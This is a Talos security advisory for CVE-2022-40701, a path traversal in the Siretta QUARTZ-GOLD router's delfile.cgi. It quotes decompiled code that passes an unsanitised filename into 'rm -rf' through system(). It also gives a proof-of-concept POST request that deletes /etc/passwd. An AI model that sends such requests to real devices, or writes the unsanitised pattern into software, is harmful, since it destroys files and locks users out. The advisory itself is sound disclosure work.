# Talos Vulnerability Report
### TALOS-2022-1606
## Siretta QUARTZ-GOLD httpd delfile.cgi directory traversal vulnerability
##### January 26, 2023
##### CVE Number
CVE-2022-40701
##### SUMMARY
A directory traversal vulnerability exists in the httpd delfile.cgi functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted HTTP request can lead to arbitrary file deletion. An attacker can send an HTTP request to trigger this vulnerability.
##### CONFIRMED VULNERABLE VERSIONS
The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
Siretta QUARTZ-GOLD G5.0.1.5-210720-141020
##### PRODUCT URLS
QUARTZ-GOLD –
##### CVSSv3 SCORE
6.5 – CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H
##### CWE
CWE-22 – Improper Limitation of a Pathname to a Restricted Directory (âPath Traversalâ)
##### DETAILS
The Siretta QUARTZ-GOLD is an industrial cellular router with several features and services, such as: SSH, UPNP, VPN, SNMP and many others.
The QUARTZ-GOLD router has a web server with several functionalities, a subset of which are related to the management of external files. Indeed, the web-server offers API for uploading files, downloading them, and also deleting if no longer required.
Following the API to delete a previously uploaded file:
void delfile.cgi(void)
{
[…]
[… calculate the value of the base_folder variable …]
_filename_param = (char *)webcgi_safeget(“_filename”); [1]
filename_ = “”;
if (_filename_param != (char *)0x0) {
filename_ = _filename_param;
}
if (*filename_ != ”) {
sprintf(command_buff,”rm -rf %s/%s”,base_folder,filename_); [2]
system(command_buff); [3]
}
[…]
}
The `delfile.cgi` expects one parameter called `_filename` that represents the filename of the desired file to be deleted. At `[1]` the uploaded parameter is taken and then used at `[2]`. From the fetch of the `_filename` parameter, at `[1]`, to its usage at `[2]` there is no sanitization of the parameter. Then at `[3]` the string `rm -rf /` is used as parameter of the `system` function. This functionality is vulnerable to a path traversal, allowing the deletion of arbitrary files in the file-system.
### Exploit Proof of Concept
For example, sending the following request:
POST /delfile.cgi HTTP/1.1
Authorization: Basic
Content-Length: 55
_filename=../../etc/passwd&_http_id=
would prohibit access with SSH.
##### TIMELINE
2022-10-14 – Initial Vendor Contact
2022-10-20 – Vendor Disclosure
2022-11-24 – Vendor Patch Release
2023-01-26 – Public Release
##### Credit
Discovered by Francesco Benvenuto of Cisco Talos.
* * *
Vulnerability Reports Next Report
TALOS-2022-1607
Previous Report
TALOS-2022-1605Read More
References
Back to Main
